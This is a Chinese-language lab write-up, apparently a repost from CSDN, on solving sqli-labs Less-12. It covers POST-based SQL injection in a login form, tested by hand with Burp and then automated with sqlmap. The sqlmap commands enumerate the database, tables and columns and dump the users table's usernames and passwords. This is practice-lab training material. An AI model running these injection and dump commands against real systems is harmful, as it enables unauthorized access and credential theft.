标签：sqlmap labs 12 sqli technique Labs Sqli uname POST

打开bp抓包

发送至Repeater，添加 \ 进行测试

根据报错：222") 猜测查询语句：

select uname, passwd from table where uname=(“xxxx”) and passwd=(“xxxx”)

根据猜测进行注入：

成功登陆。

使用sqlmap进一步测试

复制截取的数据包在kali中保存为新文件 sqli-labs-12

使用以下命令进行测试：
sqlmap -r sqli-labs-12 -p uname

发现无法与服务器建立连接，在思考后发现，截取的数据包中主机为 localhost ，而复制进kali后，就应该将 主机修改为 服务器的 ip ：192.168.0.104

再次连接，成功

继续，奥里给，干了！

还是刚才的查询语句
sqlmap -r sqli-labs-12 -p uname

其中 -r 表示从文件读取数据（read）
-p 表示用于注入的参数

查看扫描结果：

出现了基于报错的注入，继续利用该类型的注入，指定注入类型为 error-based ，查询库内容

指定注入类型 E （error）
sqlmap -r sqli-labs-12 -p uname --technique E

查询当前数据库
sqlmap -r sqli-labs-12 -p uname --technique E --current-db

查询 security 库中的表
sqlmap -r sqli-labs-12 -p uname --technique E -D security --tables

查询 users 中的字段
qlmap -r sqli-labs-12 -p uname --technique E -D security -T users --columns

查询字段内容
sqlmap -r sqli-labs-12 -p uname --technique E -D security -T users -C "username, password" --dump

至此。

• 点赞
• 收藏
• 分享
• • 文章举报

工科学生死板板 发布了82 篇原创文章 · 获赞 102 · 访问量 1万+ 私信 关注

标签：sqlmap,labs,12,sqli,technique,Labs,Sqli,uname,POST
来源： https://blog.csdn.net/qq_43968080/article/details/104004170

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。